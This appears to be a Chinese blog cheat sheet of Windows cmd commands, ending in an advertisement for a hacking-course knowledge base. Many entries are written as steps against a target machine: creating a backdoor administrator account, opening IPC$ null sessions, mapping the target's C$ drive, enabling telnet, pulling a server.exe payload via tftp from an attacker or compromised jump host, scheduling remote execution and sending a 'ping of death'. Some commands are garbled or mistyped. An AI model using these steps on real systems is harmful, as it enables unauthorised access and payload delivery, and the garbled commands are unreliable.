首先我们要知道什么叫cmd:
Windows 命令提示符(cmd.exe)是 Windows NT 下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序;或在 Windows CE 下只用于运行控制面板程序的外壳程序。
开始-运行-输入cmd即可打开。
net user heibai lovechina /add
加一个heibai的用户密码为lovechina
net localgroup Administrators heibai /add
把他加入Administrator组
net start telnet
开对方的TELNET服务
net use z:\127.0.0.1c$
映射对方的C盘
net use \\ip\ipc$ " " /user:" "
建立IPC空链接
net use \\ip\ipc$ “密码” /user:“用户名”
建立IPC非空链接
net use h: \\ip\c$ “密码” /user:“用户名”
直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$
登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del
删除IPC链接
net use h: /del
删除映射对方到本地的为H:的映射
net user 用户名 密码
/add 建立用户
net user
查看有哪些用户
net user
帐户名 查看帐户的属性
net user guest /active:yes
将Guest用户激活
net user guest lovechina
把guest的密码改为lovechina
net user 用户名 /delete
删掉用户
net user guest/time:m-f,08:00-17:00
表示guest用户登录时间为周一至周五的
net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00
表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00.
net user guest/time:all
表示没有时间限制.
net user guest/time
表示guest用户永远不能登录. 但是只能限制登陆时间,不是上网时间
net time \\127.0.0.1
得到对方的时间
get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
copy index.htm \\127.0.0.1\c$\index.htm
本地C盘下的index.htm复制到127.0.0.1的C盘
net localgroup administrators
用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start
查看开启了哪些服务
net start服务名
开启服务;(如:net start telnet, net start schedule)
net stop 服务名
停止某服务
net time \\目标ip
查看对方时间
net time \\目标ip /set
设置本地计算机时间与“目标IP”主机的时间同步,加参数/yes可取消确认信息
net view
查看本地局域网内开启了哪些共享
net view \\ip
查看对方局域网内开启了哪些共享
net config
显示系统网络设置
net logoff
断开连接的共享
net pause
服务名 暂停某服务
net send ip “文本信息”
向对方发信息
net ver
局域网内正在使用的网络连接类型和信息
net share
查看本地开启的共享
net share ipc$
开启ipc$共享
net share ipc$ /del
删除ipc$共享
net share c$ /del
删除C:共享
net user guest 12345
用guest用户登陆后用将密码改为12345
net password
密码 更改系统登陆密码
netstat -a
查看开启了哪些端口,常用netstat -an
netstat -n
查看端口的网络连接情况,常用netstat -an
netstat -v
查看正在进行的工作
netstat -p 协议名
例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s
查看正在使用的所有协议使用情况
nbtsta* -* **
对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip
死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg)
用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t
以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名
加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名
加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。
同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,“> “和”> >” 是重定向命令
at id号 开启已注册的某个计划任务
at /delete
停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete
停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time
程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host
查看最近有哪些用户登陆
telnet ip
端口 远和登陆服务器,默认端口为23
open ip
连接到IP(属telnet登陆后的命令)
telnet
在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe " > i p a d m i n ">\\\\ip\\admin ">ipadmin
复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy s v v . e x e " > i p a d m i n \\svv.exe">\\\\ip\\admin svv.exe">ipadmin\svv.exec:\ 或:copy\\ip\admin$\*.*
复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy
要复制的文件或目录树
目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i
自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i
对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip
端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print
显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp
查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start
程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem
查看cpu使用情况
attrib
文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir
查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t
使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set
指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p
(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause
暂停批处理程序,并显示出:请按任意键继续…
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto
标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for
对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off
打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo
信息 在屏幕上显示出信息
echo 信息 >> pass.txt
将"信息"保存到pass.txt文件中
findstr “Hello” aa.txt
在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;
0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称
更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名 打印文本文件
我们可以拿个用cmd指令关机来做个示范吧。
打开cmd,输入shutdown如果您要关机输入shutdown -s,重启shutdown -r要定时关机,可以输入shutdown -s -t XXX,XXX代表多少秒后关机1分钟60秒,就可以输入shutdown -s -t 60具体看情况。如果懒得打开cmd输入指令的可以制作一个xxx.bat文件。方法:打开记事本输入关机或者重启定时关机(看用户情况)的代码,保存,文件名可以自行编辑但是,后缀名必须改成bat文件。
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
